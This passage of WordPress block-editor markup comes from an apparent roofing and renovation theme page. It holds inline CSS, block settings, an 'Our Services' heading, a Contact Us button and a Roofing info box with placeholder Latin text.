undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"953dcb7c-b238-4718-b90a-88d1da2d4246\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-953dcb7c-b238-4718-b90a-88d1da2d4246 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-953dcb7c-b238-4718-b90a-88d1da2d4246\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"3ad3deef-c09c-435f-9bef-60608e900e64\"} -->\n<style type=\"text/css\"> .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3ad3deef-c09c-435f-9bef-60608e900e64\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"93c9f688-c757-4040-a3f6-7eb370a7507b\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-93c9f688-c757-4040-a3f6-7eb370a7507b skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"61ff780f-af32-46b2-9e22-40df4790a340\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-61ff780f-af32-46b2-9e22-40df4790a340 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde\"} -->\n<style type=\"text/css\"> .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"e09e3d4d-a9bf-4014-b461-dbc47b884dfa\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"08934182-4560-4a6c-8515-6f6f806e013c\"} -->\n<style type=\"text/css\"> .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"af9e4793-906c-4dfa-bbb9-ebc53b817ade\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; 